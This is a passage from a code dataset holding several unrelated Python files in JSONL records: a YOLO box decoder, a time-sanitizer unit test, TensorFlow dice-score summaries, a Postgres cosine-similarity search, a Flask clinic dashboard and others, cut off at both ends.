tf.squeeze(centre_y)\n \n out = tf.squeeze(tf.gather(ANCHORS,anchor_index),1)\n \n \n width = out[...,0]*tf.squeeze( tf.math.exp(tw) ) #ANCHOR first dim is width\n height = out[...,1] * tf.squeeze( tf.math.exp(th) ) \n\n #in pixels\n width = width * IMAGE_W\n height = height * IMAGE_H\n\n #Convert back to categories\n one_hot_vectors =tf.squeeze( tf.gather( tf.reshape(y[...,5:],[-1,NUM_CLASSES]), boxes_loc))\n class_ID = tf.argmax(one_hot_vectors, axis=-1)\n\n \n x_min= (centre_x - width/2)\n x_max= tf.minimum((centre_x + width/2),IMAGE_W-1)\n y_min= tf.maximum((centre_y - height/2),0)\n y_max= tf.minimum((centre_y + height/2),IMAGE_H-1)\n\n boxes = tf.stack([x_min,y_min,x_max,y_max])\n \n return boxes,class_ID\n\n# input is (image,y)\n# image size is fixed as per hyper_parameters\ndef display_yolo_output(img,y): \n boxes,class_ID = decode_yolo_output(y)\n class_ID = class_ID.numpy()\n class_ID = np.squeeze(class_ID)\n box_labels = [idx2cat[i] for i in class_ID]\n\n print(box_labels)\n img = img.numpy()*255\n img = np.ndarray.astype(img,np.uint8)\n \n\n for i in range(0, len(boxes[0])):\n # changed color and width to make it visible\n cv2.rectangle(img, (int(boxes[0][i]), int(boxes[1][i])), (int(boxes[2][i]), int(boxes[3][i])), (255, 0, 0), 2)\n cv2.imshow(\"img\", img[...,::-1]) # convert back from RGB to BGR for display\n cv2.waitKey(0)\n 
cv2.destroyAllWindows()\n\n","repo_name":"lastsupper108/Lucid_Yolo","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":2886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71935779743","text":"import calendar\nimport logging\nimport os\nimport tempfile\nimport time\nimport unittest\nfrom unittest import mock\n\nfrom cros.factory.tools import time_sanitizer\nfrom cros.factory.utils import file_utils\n\n\nBASE_TIME = float(\n calendar.timegm(time.strptime('Sat Jun 9 00:00:00 2012')))\n\nSECONDS_PER_DAY = 86400\n\n\n# pylint: disable=protected-access\nclass TimeSanitizerTestBase(unittest.TestCase):\n\n def setUp(self):\n self.fake_time = mock.Mock(time_sanitizer.Time)\n\n self.sanitizer = time_sanitizer.TimeSanitizer(\n self.state_file,\n monitor_interval_secs=30,\n time_bump_secs=60,\n max_leap_secs=SECONDS_PER_DAY)\n self.sanitizer._time = self.fake_time\n self.sanitizer._suppress_exceptions = False\n\n def run(self, result=None):\n with file_utils.TempDirectory(\n prefix='time_sanitizer_unittest.') as temp_dir:\n # pylint: disable=attribute-defined-outside-init\n self.state_file = os.path.join(temp_dir, 'state_file')\n super(TimeSanitizerTestBase, self).run(result)\n\n def _ReadStateFile(self):\n return float(open(self.state_file).read().strip())\n\n\nclass TimeSanitizerBaseTimeTest(TimeSanitizerTestBase):\n\n def runTest(self):\n # pylint: disable=protected-access\n # (access to protected members)\n with tempfile.NamedTemporaryFile() as f:\n self.assertEqual(\n os.stat(f.name).st_mtime,\n time_sanitizer.GetBaseTimeFromFile([f.name]))\n self.assertEqual(\n None, time_sanitizer.GetBaseTimeFromFile(['/some-nonexistent-file']))\n\n\nclass TimeSanitizerTest(TimeSanitizerTestBase):\n\n def runTest(self):\n self.fake_time.Time.return_value = BASE_TIME\n\n self.sanitizer.RunOnce()\n self.assertEqual(BASE_TIME, self._ReadStateFile())\n self.fake_time.Time.assert_called_once_with()\n self.fake_time.Time.reset_mock()\n\n # Now move forward 1 second, and then forward 0 seconds. Should\n # be fine.\n for unused_iteration in range(2):\n self.fake_time.Time.return_value = BASE_TIME + 1\n\n self.sanitizer.RunOnce()\n self.assertEqual(BASE_TIME + 1, self._ReadStateFile())\n self.fake_time.Time.assert_called_once_with()\n self.fake_time.Time.reset_mock()\n\n # Now move forward 2 days. This should be considered hosed, so\n # the time should be bumped up by time_bump_secs (120).\n self.fake_time.Time.return_value = BASE_TIME + 2 * SECONDS_PER_DAY\n\n self.sanitizer.RunOnce()\n self.assertEqual(BASE_TIME + 61, self._ReadStateFile())\n self.fake_time.Time.assert_called_once_with()\n self.fake_time.Time.reset_mock()\n self.fake_time.SetTime.assert_called_with(BASE_TIME + 61)\n\n # Move forward a bunch. Fine.\n self.fake_time.Time.return_value = BASE_TIME + 201.5\n\n self.sanitizer.RunOnce()\n self.assertEqual(BASE_TIME + 201.5, self._ReadStateFile())\n self.fake_time.Time.assert_called_once_with()\n self.fake_time.Time.reset_mock()\n\n # Jump back 20 seconds. 
Not fine!\n self.fake_time.Time.return_value = BASE_TIME + 181.5\n\n self.sanitizer.RunOnce()\n self.assertEqual(BASE_TIME + 261.5, self._ReadStateFile())\n self.fake_time.Time.assert_called_once_with()\n self.fake_time.SetTime.assert_called_with(BASE_TIME + 261.5)\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.DEBUG)\n unittest.main()\n","repo_name":"arccode/factory","sub_path":"py/tools/time_sanitizer_unittest.py","file_name":"time_sanitizer_unittest.py","file_ext":"py","file_size_in_byte":3287,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"36141663699","text":"# Written by Chun Kit Wong and CIRC under MIT license:\n# https://github.com/wong-ck/DeepSegment/blob/master/LICENSE\n\nimport tensorflow as tf\n\n\ndef trainables():\n for trainable in tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES):\n tf.summary.histogram(str(trainable.name).replace(':', '_'), trainable)\n\n\ndef ndim_image(\n name,\n tensor,\n min_value=None,\n max_value=None,\n max_outputs=3,\n collections=None,\n family=None\n):\n img = tensor\n\n # extract middle slices if the tensor has more than 2 spatial dimensions\n img_shape = img.get_shape().as_list()\n img_dim = len(img_shape)\n if img_dim > 3:\n img_begin = [0 if i < 3 else img_shape[i] // 2 for i in range(img_dim)]\n\n img_size = [img_shape[i] if i < 3 else 1 for i in range(img_dim)]\n img_size[0] = -1\n\n img = tf.slice(img, img_begin, img_size)\n\n # reshape\n img = tf.reshape(img, tf.stack((-1, img_shape[1], img_shape[2], 1)))\n\n # clip value\n if any((x is not None) for x in [min_value, max_value]):\n # determine threshold values\n if min_value is None:\n min_value = tf.math.reduce_min(img)\n\n if max_value is None:\n max_value = tf.math.reduce_max(img)\n\n # cast to float32\n img = tf.cast(img, tf.float32)\n\n # clip value\n img = tf.clip_by_value(img, min_value, max_value)\n\n # shift and rescale so that [min_value, max_value] maps to [0, 255]\n img -= min_value\n img *= 255.0 / (max_value - min_value)\n\n # cast to uint8 so that tf.summary.image doesn't perform rescaling\n img = tf.cast(img, tf.uint8)\n\n # tf.summary: add as image\n return tf.summary.image(\n name=name,\n tensor=img,\n max_outputs=max_outputs,\n collections=collections,\n family=family\n )\n\n\ndef categorical_dices(\n labels,\n predictions,\n nclasses,\n presences=None,\n classnames=None,\n epsilon=1e-10,\n collections=None,\n family=None,\n):\n # check that classnames has correct length (if defined)\n if classnames is None:\n classnames = [\"cat{:02d}\".format(i) for i in range(nclasses)]\n\n if len(classnames) != nclasses:\n msg = \"classnames must be a list of length nclasses!\"\n raise ValueError(msg)\n\n # prepare presence array\n if presences is None:\n presences = tf.ones(shape=(1, nclasses), dtype=tf.float32)\n else:\n presences = tf.cast(presences, dtype=tf.bool)\n presences = tf.cast(presences, dtype=tf.float32)\n # shape: (1, nclasses) or (batchsize, nclasses)\n\n # calculate dice score (per image per class/category)\n dice_per_img_per_cls = _calculate_dice_per_img_per_cls(\n labels, predictions, nclasses, epsilon\n )\n # shape: (batchsize, nclasses)\n\n # calculate dice score (per class/category)\n dice_per_cls = []\n for cat in range(nclasses):\n # create a mask to exclude dice of all other classes\n mask = tf.one_hot(cat, depth=nclasses, dtype=tf.float32)\n mask = tf.expand_dims(mask, axis=0)\n # shape: (1, nclasses)\n\n mask *= presences\n # shape: (1, nclasses) or (batchsize, nclasses)\n\n mask *= tf.clip_by_value(dice_per_img_per_cls, 1.0, 
1.0)\n # shape: (batchsize, nclasses)\n\n # calculate average dice (across batch)\n dice_sum = tf.reduce_sum(mask * dice_per_img_per_cls)\n dice_count = tf.reduce_sum(mask)\n\n dice_score = tf.cond(\n tf.less(dice_count, epsilon),\n true_fn=lambda: tf.convert_to_tensor(-1.0, dtype=tf.float32),\n false_fn=lambda: dice_sum / dice_count\n )\n\n dice_per_cls += [dice_score]\n\n # add to tf.summary\n summary_bufs = []\n for classname, dice_score in zip(classnames, dice_per_cls):\n buf = tf.summary.scalar(\"dice_\" + classname, dice_score, family=family)\n summary_bufs += [buf]\n\n return summary_bufs\n\n\ndef average_dice(\n labels,\n predictions,\n nclasses,\n presences=None,\n classnames=None,\n weights=1.0,\n epsilon=1e-10,\n collections=None,\n family=None,\n):\n # check that classnames has correct length (if defined)\n if classnames is None:\n classnames = [\"cat{:02d}\".format(i) for i in range(nclasses)]\n\n if len(classnames) != nclasses:\n msg = \"classnames must be a list of length nclasses!\"\n raise ValueError(msg)\n\n # check that weights has correct length\n if any(isinstance(weights, x) for x in [int, float]):\n weights = [weights] * nclasses\n\n if len(weights) != nclasses:\n msg = \"if weights is a list, length must be nclasses!\"\n raise ValueError(msg)\n\n # prepare presence array\n if presences is None:\n presences = tf.ones(shape=(1, nclasses), dtype=tf.float32)\n else:\n presences = tf.cast(presences, dtype=tf.bool)\n presences = tf.cast(presences, dtype=tf.float32)\n # shape: (1, nclasses) or (batchsize, nclasses)\n\n # calculate dice score (per image per class/category)\n dice_per_img_per_cls = _calculate_dice_per_img_per_cls(\n labels, predictions, nclasses, epsilon\n )\n # shape: (batchsize, nclasses)\n\n # create a weightage mask by merging weights and presences\n mask = tf.convert_to_tensor(weights, dtype=tf.float32)\n # shape: (nclasses,)\n\n mask = tf.expand_dims(mask, axis=0)\n # shape: (1, nclasses)\n\n mask *= presences\n # shape: (1, nclasses) or (batchsize, nclasses)\n\n mask *= tf.clip_by_value(dice_per_img_per_cls, 1.0, 1.0)\n # shape: (batchsize, nclasses)\n\n # calculate average dice (across batch)\n dice_sum = tf.reduce_sum(mask * tf.convert_to_tensor(dice_per_img_per_cls))\n dice_count = tf.reduce_sum(mask)\n\n dice_mean = tf.cond(\n tf.less(dice_count, epsilon),\n true_fn=lambda: tf.convert_to_tensor(-1.0, dtype=tf.float32),\n false_fn=lambda: dice_sum / dice_count\n )\n\n return tf.summary.scalar(\"dice_mean\", dice_mean, family=family)\n\n\ndef _calculate_dice_per_img_per_cls(labels, predictions, nclasses, epsilon):\n # prepare images\n onehot_labels = tf.one_hot(labels, depth=nclasses)\n onehot_preds = tf.one_hot(predictions, depth=nclasses)\n\n # calculate dice score (per image per class/category)\n reduce_axis = range(1, len(onehot_labels.get_shape()) - 1)\n reduce_axis = tuple(reduce_axis)\n\n i = tf.reduce_sum(onehot_labels * onehot_preds, axis=reduce_axis)\n l = tf.reduce_sum(onehot_preds, axis=reduce_axis)\n r = tf.reduce_sum(onehot_labels, axis=reduce_axis)\n\n dice_per_img_per_cls = tf.divide(2 * i + epsilon, (l + r) + epsilon)\n # shape: (batchsize, nclasses)\n\n return dice_per_img_per_cls\n","repo_name":"wong-ck/DeepSegment","sub_path":"utilities/tfwrapper/summary.py","file_name":"summary.py","file_ext":"py","file_size_in_byte":6614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"32001011170","text":"import psycopg2\nimport numpy\nfrom nltk.tokenize import toktok\n\nfrom 
nltk.stem.snowball import SnowballStemmer\nfrom search import lemmatize_search, get_articles, get_url_by_article_uid\nfrom tf_idf import get_idf\n\nfrom nltk.corpus import stopwords\nfrom typing import Callable\nfrom pymystem3 import Mystem\nfrom copy import deepcopy\nimport math\n\nsb_stemmer = SnowballStemmer(\"russian\")\n\ndef get_tf_idf(connection, article_id):\n query = \"\"\"\n SELECT term_id, tf_idf FROM article_term\n WHERE article_id = %s\n \"\"\"\n connection.execute(query, (article_id, ))\n results = dict(connection.fetchall())\n return results\n\nCOS = dict()\n\nif __name__ == \"__main__\":\n connection = psycopg2.connect(database='postgres',\n user='postgres',\n password='postgres',\n host='0.0.0.0',\n port=4321)\n cursor = connection.cursor()\n try:\n search_string = str(input(\"Input search word: \"))\n lemmas = lemmatize_search(search_string)\n articles_ids = list(map(lambda lem: get_articles(cursor, lem), lemmas))\n merged_article_ids = set()\n for ids in articles_ids:\n merged_article_ids = merged_article_ids.union(set(ids))\n for article_id in merged_article_ids:\n tf_idf = get_tf_idf(cursor, article_id)\n idf = get_idf(cursor)\n numerator = .0; den_A = .0; den_B = .0\n for term_id, tf_idf in tf_idf.items():\n numerator += tf_idf * idf.get(term_id, 0)\n den_A += idf.get(term_id, 0) ** 2\n den_B += tf_idf ** 2\n COS[article_id] = numerator / (math.sqrt(den_A) * math.sqrt(den_B))\n results = sorted(COS.items(), key=lambda k: k[1], reverse=True)[:10]\n for id, value in results:\n print(get_url_by_article_uid(cursor, id), value)\n except Exception as e:\n print(e)\n finally:\n cursor.close()\n connection.close()\n","repo_name":"MardanovTimur/smart-search","sub_path":"cos_similarity.py","file_name":"cos_similarity.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"44279010534","text":"# %%\r\nimport json\r\nimport xml.etree.ElementTree as ElementTree\r\nimport dateutil.parser as dtparser\r\nimport pandas as pd\r\nfrom lib import dictFind, getXmlData, pivotMerge, reshapeExtInfo\r\n\r\n\r\ndef getEssays(data_frame):\r\n \"\"\"Requires columns 'accessionNumber' and 'ExtendedInfo_diffs'\"\"\"\r\n\r\n item_nums = list(data_frame['accessionNumber'].drop_duplicates())\r\n out_txts = dict.fromkeys(item_nums)\r\n\r\n for item in item_nums:\r\n print('Processing essay item \"{}\"...'.format(item))\r\n item_cmds = (cmd for row in data_frame.loc[data_frame.accessionNumber ==\r\n item].ExtendedInfo_diffs if row for cmd in row)\r\n text = ''\r\n for cmd in item_cmds:\r\n text = processInput(text, **cmd)\r\n\r\n out_txts[item] = text\r\n\r\n return out_txts\r\n\r\n\r\ndef processInput(in_str, **kwargs):\r\n\r\n try:\r\n cmd_str = kwargs['edit']\r\n txt_pos = kwargs['pos']\r\n txt_len = kwargs['len']\r\n txt = kwargs['text']\r\n except KeyError:\r\n return None\r\n\r\n chars = list(in_str)\r\n\r\n def cmdDel():\r\n nonlocal chars, txt_len, txt_pos\r\n for _ in range(txt_len):\r\n # Position can sometimes be greater than the length?? Default to end instead\r\n txt_pos = min([txt_pos, len(chars)])\r\n if chars:\r\n chars.pop(txt_pos-1)\r\n\r\n def cmdIns():\r\n # Some (but not all) spaces seem to be encoded. 
Replace these\r\n nonlocal chars, txt, txt_pos\r\n txt = txt.replace('\\xa0', ' ')\r\n for i, char in enumerate(list(txt)):\r\n chars.insert(txt_pos-1+i, char)\r\n\r\n cmd = {'INS': cmdIns,\r\n 'DEL': cmdDel}\r\n\r\n cmd[cmd_str]()\r\n\r\n return ''.join(chars)\r\n\r\n\r\n# %%\r\n\r\n\r\ndef parseExtInfo(data_frame, attr_list=('name', 'diffs', 'textLength')):\r\n \"\"\"Convert ExtendedInfo JSON data from Pilot Observables into columns\"\"\"\r\n\r\n if not 'ExtendedInfo' in data_frame.columns:\r\n return None\r\n\r\n # '3513001666_ObservableData.Xml': Why is there invalid JSON data in a \"Pilot Observables\" row?\r\n # Should be \"Vertical Item Scroll\"?\r\n # Need to work around this\r\n ext_info = list()\r\n for val in data_frame['ExtendedInfo']:\r\n try:\r\n ext_info.append(json.loads(val))\r\n except json.JSONDecodeError:\r\n ext_info.append(val)\r\n\r\n for colname in attr_list:\r\n data_frame['ExtendedInfo_{0}'.format(colname)] = [dictFind(\r\n val, colname) or val for val in ext_info]\r\n\r\n return data_frame\r\n\r\n\r\ndef postProcWriting(data_frame):\r\n # Somewhat hacky at the moment - needs clean up and generalization\r\n df = data_frame.query('interpretation==\"Pilot Observables\"')\r\n df = df[['accessionNumber', 'itemType', 'blockCode', 'ID_outcomeVariable',\r\n 'fieldIdentifier', 'text_value']]\r\n\r\n # Columns to uniquely identify transformed rows\r\n id_cols = ['accessionNumber', 'itemType',\r\n 'blockCode', 'ID_outcomeVariable']\r\n\r\n # Pivot to create one column for time and another for ExtendedInfo\r\n cols_df = df.drop_duplicates(id_cols)[id_cols]\r\n data_df = df.pivot(index='ID_outcomeVariable',\r\n columns='fieldIdentifier', values='text_value')\r\n\r\n # Drop missing ExtendedInfo and re-merge ID columns\r\n data_df = data_df[data_df['ExtendedInfo'].notna()]\r\n data_df = pd.merge(cols_df, data_df, on='ID_outcomeVariable')\r\n\r\n # Parse EventTime as datetime and sort\r\n data_df['EventTime'] = [dtparser.parse(\r\n dtstr) for dtstr in list(data_df['EventTime'])]\r\n data_df = data_df.sort_values(\r\n by=['EventTime', 'accessionNumber', 'ID_outcomeVariable'])\r\n\r\n # Unwind columns\r\n # '3513001666_ObservableData.Xml': Why is there invalid JSON data in a \"Pilot Observables\" row?\r\n # Should be \"Vertical Item Scroll\"?\r\n # Need to work around this\r\n ext_info = list()\r\n for val in data_df['ExtendedInfo']:\r\n try:\r\n ext_info.append(json.loads(val))\r\n# ext_info = [json.loads(val) for val in data_df['ExtendedInfo']]\r\n except json.JSONDecodeError:\r\n ext_info.append({})\r\n\r\n for colname in ['name', 'diffs', 'textContext', 'textLength']:\r\n data_df['ExtendedInfo_{0}'.format(colname)] = [dictFind(\r\n val_dict, colname) for val_dict in ext_info]\r\n\r\n return data_df.loc[(data_df.ExtendedInfo_name == 'text.change') & (data_df.ExtendedInfo_diffs.notna())]\r\n\r\n\r\n# %%\r\n","repo_name":"dyee-air/xml_procdata","sub_path":"postproc/pp_writing_text.py","file_name":"pp_writing_text.py","file_ext":"py","file_size_in_byte":4465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"10341854719","text":"from markovmodel import MarkovModel\nfrom tokenize import tokenize\nimport pickle\nimport sys\n\n\nif __name__ == \"__main__\":\n # set to 100,000 to avoid max recursion depth exceeded error\n sys.setrecursionlimit(100000)\n # c = Corpus version number\n c = 5\n words = tokenize(\"corpus/clean_corpus_{}.txt\".format(c))\n model = None\n # n = lookback\n n = 3\n # if a model already exists load it\n 
with open(\"models/trained_model{}_{}.p\".format(c, n), \"rb\") as file:\n if len(list(file.peek())) > 0:\n model = pickle.load(file)\n # if not, train one and pickle it\n if not model:\n with open(\"models/trained_model{}_{}.p\".format(c, n), \"wb\") as file:\n model = MarkovModel()\n model.train(words, n)\n pickle.dump(model, file)\n inp = input(\"Len: \")\n # keep asking for length\n while input != 0:\n sentences = model.random_walk(int(inp))\n print(sentences)\n inp = input(\"Len: \")\n","repo_name":"MakeSchool-17/twitter-bot-python-darioncassel","sub_path":"markovmodel_tester.py","file_name":"markovmodel_tester.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"3850091168","text":"from datetime import datetime\n\nimport psycopg2\nfrom flask import Blueprint, render_template, flash, request, jsonify\nfrom flask_login import login_required, current_user\nfrom flask_sqlalchemy import get_debug_queries\n#from flask_sqlalchemy import or_\n\nfrom app import db, POSTGRES_PASS, POSTGRES_USER, POSTGRES_DB, POSTGRES_URL\nfrom dashboard.forms import AppointmentCreationForm, TreatmentCreationForm, PatientCreationForm, DoctorForm\nfrom dashboard.models import Appointment, Treatment\nfrom users.models import Patient, Polyclinic\n\ndashboard = Blueprint('dashboard', __name__)\n\n\n@dashboard.route('/')\n@dashboard.route('/dashboard')\n@login_required\ndef profile():\n return current_user.user_dashboard()\n\n\n@dashboard.route('/make_appointment', methods=['GET', 'POST'])\n@login_required\ndef create_appointment():\n form = AppointmentCreationForm()\n if request.method == 'GET':\n return render_template('appointment.html', form=form)\n\n if request.method == 'POST':\n if form.validate_on_submit():\n patient = Patient.query.filter_by(p_tc=form.patient_tc.data).first()\n polyclinic = Polyclinic.query.filter_by(pol_name=form.polyclinic_name.data).first()\n new_appointment = Appointment(\n patient_tc=patient.p_tc,\n poly_name=polyclinic.pol_name,\n on_date=datetime.combine(form.on.data, form.hour.data),\n )\n if current_user.user_type == 'Patient':\n current_user.appos1.append(new_appointment)\n\n if current_user.user_type == 'Polyclinic':\n current_user.appos2.append(new_appointment)\n\n db.session.add(new_appointment)\n db.session.commit()\n flash('Randevu basariyla kaydedildi.')\n\n return render_template('appointment.html', form=form)\n\n\n@dashboard.route('/create_new_patient', methods=['GET', 'POST'])\n@login_required\ndef create_patient():\n conn = get_db_connection()\n usr_id_s = conn.cursor()\n usr_id_s.execute('SELECT user_id FROM appuser;')\n user_ids = usr_id_s.fetchall()\n patient_usrnames = conn.cursor()\n patient_usrnames.execute('SELECT p_name FROM patient, appuser where p_id=user_id;')\n # remove edildiginde appuser database'inden silinmeyip, patient database'inden silindigi icin\n # kullanici adi auto gen. 
icin yapildi.\n patient_usernames = patient_usrnames.fetchall()\n pat_tcs = conn.cursor()\n pat_tcs.execute('SELECT p_tc FROM patient;')\n patient_tc = pat_tcs.fetchall()\n\n patient_creation_form = PatientCreationForm()\n if request.method == 'GET':\n return render_template('create_patient.html', patient_creation_form=patient_creation_form)\n\n if request.method == 'POST':\n if patient_creation_form.validate_on_submit():\n new_patient = Patient(\n p_name=patient_creation_form.p_name.data,\n p_last_name=patient_creation_form.p_last_name.data,\n p_tc=patient_creation_form.p_tc.data,\n p_bdate=patient_creation_form.p_bdate.data,\n p_phone=patient_creation_form.p_phone.data,\n p_address=patient_creation_form.p_address.data,\n user_id=len(user_ids) + 1,\n username='pat' + str(len(patient_usernames) + 1),\n user_password='123456',\n user_type='Patient'\n )\n\n sameTCFlag = False\n for tc in patient_tc:\n print('length Ptc = ' + str(len(patient_tc)))\n if new_patient.p_tc == tc[0]:\n flash('Hata Olustu : Insan mi klonluyoruz???.', 'error')\n sameTCFlag = True\n\n if not sameTCFlag:\n db.session.add(new_patient)\n # ustteki komut:\n # INSERT INTO appuser (username, user_password, user_type) VALUES (%(username)s, %(user_password)s, %(user_type)s);\n db.session.commit()\n flash('Bilgi : Hasta bilgileri olusturuldu.', 'message')\n\n return render_template('create_patient.html', user=current_user,\n patient_creation_form=patient_creation_form)\n\n\n@dashboard.route('/register_new_treatment', methods=['GET', 'POST'])\n@login_required\ndef register_new_treatment():\n treatment_creation_form = TreatmentCreationForm()\n if request.method == 'GET':\n return render_template('register_new_treatment.html', treatment_creation_form=treatment_creation_form)\n\n if request.method == 'POST':\n if treatment_creation_form.validate_on_submit():\n new_treatment = Treatment(\n pa_tc=treatment_creation_form.patient_tckn.data,\n d_tc='12345678901',\n diagnosis=treatment_creation_form.diagnosis.data,\n treatment=treatment_creation_form.treatment.data,\n )\n db.session.add(new_treatment)\n db.session.commit()\n flash('Tedavi olusturuldu.')\n\n return render_template('register_new_treatment.html', user=current_user,\n treatment_creation_form=treatment_creation_form)\n\n\n@dashboard.route('/list_patient', methods=['GET', 'POST'])\n@login_required\ndef list_patient():\n patients = Patient.query.all()\n print(get_debug_queries())\n if request.method == \"POST\":\n id = request.form['button-delete']\n Patient.query.filter_by(p_id=id).delete()\n db.session.commit()\n patients = Patient.query.all()\n return render_template('list_patient.html', patients=patients)\n return render_template('list_patient.html', patients=patients)\n\n\n@dashboard.route('/list_treatments', methods=['GET', 'POST'])\n@login_required\ndef list_treatments():\n treatments = Treatment.query.all()\n print(get_debug_queries())\n if request.method == \"POST\":\n id = request.form['button-delete']\n Treatment.query.filter_by(patient_tc=id).delete()\n db.session.commit()\n treatments = Treatment.query.all()\n return render_template('list_treatments.html', treatments=treatments)\n return render_template('list_treatments.html', treatments=treatments)\n\n@dashboard.route('/delete_patient', methods=['GET'])\n@login_required\ndef delete_patient():\n p_id = request.args['button-delete']\n temp_patient = Patient.query.filter_by(p_id=p_id)\n Patient.query.filter_by(patient_id=p_id).delete()\n db.session.commit()\n return jsonify({'msg': \"{} 
silindi.\".format(temp_patient.p_name)})\n\n\n@dashboard.route('/display_registers', methods=['GET', 'POST'])\n@login_required\ndef display_registers():\n if current_user.user_type == 'Patient':\n appointments = current_user.appos1\n\n if current_user.user_type == 'Polyclinic':\n appointments = current_user.appos2\n print(get_debug_queries())\n if request.method == \"POST\":\n id = request.form['button-delete']\n Appointment.query.filter_by(patient_tc=id).delete()\n db.session.commit()\n appointments = Appointment.query.all()\n return render_template('display_registers.html', appointments=appointments)\n return render_template('display_registers.html', appointments=appointments)\n\n\n@dashboard.route('/search_patient', methods=['POST'])\n@login_required\ndef search_patient():\n if request.form['text'] == \"\":\n return jsonify({})\n patients = Patient.query.filter(\n\n Patient.p_tc.ilike(\"%\" + request.form['text'] + \"%\") |\n Patient.p_name.ilike(\"%\" + request.form['text'] + \"%\")\n\n ).all()\n results = [p.to_dict() for p in patients]\n print(patients)\n return jsonify({'query': results})\n\n\n@dashboard.route('/delete_appointment', methods=['GET'])\n@login_required\ndef delete_appointment():\n patient_tc = request.args['button-delete']\n temp_appo = Appointment.query.filter_by(patient_tc=patient_tc)\n Appointment.query.filter_by(patient_tc=patient_tc).delete()\n db.session.commit()\n return jsonify({'msg': \"{} silindi.\".format(temp_appo.patient_tc)})\n\n\n@dashboard.route('/profile', methods=['GET', 'POST'])\n@login_required\ndef profile2():\n doctor = DoctorForm()\n user = current_user.query.filter_by().first()\n return render_template('profile.html', user=user, doctor=doctor)\n\n\ndef get_db_connection():\n conn = psycopg2.connect(host=POSTGRES_URL,\n database=POSTGRES_DB,\n user=POSTGRES_USER,\n password=POSTGRES_PASS)\n return conn\n\n\ndef layout():\n conn = get_db_connection()\n usr_id_s = conn.cursor()\n usr_id_s.execute('SELECT user_id FROM appuser where user_type=\\'Patient\\';')\n not_patient = True\n pat_id_s = usr_id_s.fetchall()\n usr = current_user.current_user.query.filter_by().first().user_id\n for id in pat_id_s:\n if id == current_user.current_user.query.filter_by().first().user_id:\n not_patient = False\n usr_id_s.close()\n conn.close()\n return render_template('layout.html', not_patient=not_patient, usr=usr)\n","repo_name":"EmreBlbn/bil372Project","sub_path":"dashboard/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":8998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"20581148880","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('perf', '0021_staff_job_name'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='DataImport',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('year', models.IntegerField(verbose_name='\\u5e74')),\n ('month', models.IntegerField(verbose_name='\\u6708')),\n ('file', models.FileField(upload_to=b'', verbose_name='Excel \\u6587\\u4ef6')),\n ('create_time', models.DateTimeField(auto_now_add=True, verbose_name='\\u4e0a\\u4f20\\u65e5\\u671f')),\n ],\n options={\n 'db_table': 'perf_data_import',\n 'verbose_name': '\\u6570\\u636e\\u5bfc\\u5165',\n 'verbose_name_plural': '\\u6570\\u636e\\u5bfc\\u5165',\n },\n ),\n migrations.AlterField(\n 
model_name='jobmatch',\n name='job',\n field=models.ForeignKey(verbose_name='\\u5bf9\\u5e94\\u5c97\\u4f4d', to='perf.Job'),\n ),\n migrations.AlterField(\n model_name='staff',\n name='job_name',\n field=models.CharField(max_length=100, verbose_name='\\u5c97\\u4f4d\\u540d\\u79f0', blank=True),\n ),\n ]\n","repo_name":"doraemonext/wbkang_xinan","sub_path":"perf/migrations/0022_auto_20160809_0116.py","file_name":"0022_auto_20160809_0116.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"28599530380","text":"from builtins import str\nfrom future.utils import iteritems\n\nfrom PB.go.chromium.org.luci.buildbucket.proto import common as common_pb2\nfrom PB.recipe_engine import result as result_pb2\n\nfrom ...engine_types import StepPresentation\n\nfrom . import StreamEngine\nfrom .product import ProductStreamEngine\n\n\nclass StreamEngineInvariants(StreamEngine):\n \"\"\"Checks that the users are using a StreamEngine hygenically.\n\n Multiply with actually functional StreamEngines so you don't have to check\n these all over the place.\n \"\"\"\n def __init__(self):\n self._streams = set()\n\n @classmethod\n def wrap(cls, other):\n \"\"\"Returns (ProductStreamEngine): A product applying invariants to \"other\".\n \"\"\"\n return ProductStreamEngine(cls(), other)\n\n @property\n def supports_concurrency(self):\n return True\n\n def write_result(self, result):\n assert isinstance(result, result_pb2.RawResult), (\n 'expected type result_pb2.RawResult; got %s' % (type(result), ))\n assert result.status & common_pb2.ENDED_MASK, (\n 'expected terminal build status; got %s' % result.status)\n\n class StepStream(StreamEngine.StepStream):\n def __init__(self, engine, step_name):\n super(StreamEngineInvariants.StepStream, self).__init__()\n self._engine = engine\n self._step_name = step_name\n self._open = True\n self._logs = {}\n self._status = 'SUCCESS'\n\n def write_line(self, line):\n assert '\\n' not in line\n assert self._open\n\n def close(self):\n assert self._open\n for log_name, log in iteritems(self._logs):\n if isinstance(log, self._engine.LogStream):\n assert not log._open, 'Log %s still open when closing step %s' % (\n log_name, self._step_name)\n self._open = False\n\n def new_log_stream(self, log_name):\n assert self._open\n assert log_name not in self._logs, 'Log %s already exists in step %s' % (\n log_name, self._step_name)\n ret = self._engine.LogStream(self, log_name)\n self._logs[log_name] = ret\n return ret\n\n def append_log(self, log):\n assert self._open\n assert isinstance(log, common_pb2.Log), (\n 'expected type common_pb2.Log; got type %s' % (type(log),))\n assert log.name not in self._logs, 'Log %s already exists in step %s' % (\n log.name, self._step_name)\n self._logs[log.name] = None # The instance is not needed\n\n def 